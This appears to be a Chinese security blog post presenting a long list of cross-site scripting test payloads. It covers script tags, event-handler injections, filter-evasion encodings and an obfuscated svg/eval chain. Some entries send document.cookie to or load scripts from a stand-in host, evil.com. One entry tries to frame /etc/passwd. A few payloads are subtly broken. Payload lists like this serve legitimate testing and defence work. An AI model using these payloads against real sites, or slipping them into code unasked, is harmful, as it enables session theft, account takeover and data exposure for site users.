ansbius
ansbius

XSS测试用例

2017/04/27 XSS

0x00
alert confirm prompt

0x01

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evil.com/cookie.php"></script>
<script>location.href="http://www.evil.com/cookie.php?cookie="+escape(document.cookie)</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xss/) />
<style>@im\port'\js\vasc\ript:alert(\"XSS\")';</style>
<? echo('<scr)';echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://www.evil.com/files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
');alert('xss
<img src="javascript:alert('xss')">
<script language='JavaScript'>alert('xss')</script>
[url=javascript:alert('xss')]click me[/url]
<body onunload="javascript:alert('XSS');">
<body onLoad="javascript:alert('XSS');">
[color=red' onmouseover="alert('XSS')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("XSS");
<div style="x.expression((window.r==1)?":eval('r=1;alert(String.fromCharCode(88.83.83));')">
<iframe<?php echo chr(11)?>onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))></script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1;alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "><"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image:url(\"javascript:alert('XSS')\")}</STYLE><UL><UI>XSS
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^'=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(1111)</script>
<body onLoad="while(true)alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript">alert('X\nS\nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.evil.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source))</script>
<SCRIPT>document.write("XSS")</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
='><script>alert("xXSS")</script>
<script+src=">"+src="http://www.evil.com/XSS.js?69,69"></script>
<body background=javascript:'"><script>alert(navigator.userAgent)</script></body>
">/XsDos/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
Data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnWoMTMzNyk8L3NjcmlwdD4=
"<marquee><img src=k.png onerror=alert(/XSS/) />
"<marquee><img src=k onerror=alert(/XSS/) />
'"><marquee><img src=k.png onerror=alert(/XSS/.source) />
</div><script>alert(123)</script>
"><iframe src='javascrip:alert(document.cookie)'></iframe>
<div style="background:url('javascript:alert(1)')">
<img src='java\nscript:alert(\"XSS\")'>
>"'><img src="javascript:alert('XSS')">
" style="background:url(javascript:alert(/XSS/))"
>"><script>alert(/XSS/)</script>
"></title><script>alert(1)</script>
'"></title><font color=red onmouseover=javascript:alert(1337)>XSS</font>
<SELECT NAME="" onmouseover=alert(123)></select>
<svg+onload=alert('xss')>
<svg+onload=alert('xss')>
<svg onload=a='document.writ'>
<svg onload=b='e(String.from'>
<svg onload=c='CharCode(60,1'>
<svg onload=d='15,99,114,105'>
<svg onload=e=',112,116,32,1'>
<svg onload=f='15,114,99,61,'>
<svg onload=g='39,104,116,11'>
<svg onload=h='6,112,58,47,4'>
<svg onload=i='7,116,46,99,1'>
<svg onload=j='10,47,82,52,8'>
<svg onload=k='6,84,75,53,66'>
<svg onload=l=',39,62,60,47,'>
<svg onload=m='115,99,114,10'>
<svg onload=n='5,112,116,62)'>
<svg onload=o=');'>
<svg onload=x=a+b+n+d+e+f+g+h>
<svg onload=t=i+j+k+l+m+n+o>
<svg onload=eval(x+t)>
<script>alert'1'</script>
<img src='1' onerror='{alert(1)}'

待测

1
2
3
4
5
"></td><details ontoggle=prompt(123)>

<img src="x" onerror="document.write('test')" />

<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

NextPost >
SQL注入测试用例
CATALOG